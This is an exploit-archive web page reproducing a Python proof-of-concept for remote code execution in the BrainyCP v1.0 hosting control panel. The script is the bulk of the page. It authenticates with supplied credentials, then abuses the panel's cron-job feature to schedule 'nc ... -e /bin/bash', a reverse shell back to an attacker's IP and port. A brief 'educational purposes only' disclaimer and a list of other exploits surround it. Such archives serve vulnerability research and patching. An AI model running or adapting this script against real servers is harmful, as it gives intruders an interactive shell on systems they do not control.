Brainycp v1.0 remote code execution Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2023-04-10 | Type : webapps | Platform : php
This exploit / vulnerability Brainycp v1.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A

import requests

# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")

# login
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
print("[-] Wrong credentials or may the system patched.")
exit()


# reverse shell
reverse_shell = f"nc {ip} {port} -e /bin/bash"

# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
"cron_freq_minutes": "*",
"cron_freq_minutes_own": "",
"cron_freq_hours": "*",
"cron_freq_hours_own": "",
"cron_freq_days": "*",
"cron_freq_days_own": "",
"cron_freq_months": "*",
"cron_freq_weekdays": "*",
"cron_command": reverse_shell,
"cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)

print("[+] Check your listener!")

Brainycp v1.0 remote code execution


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Brainycp v1.0 remote code execution Vulnerability / Exploit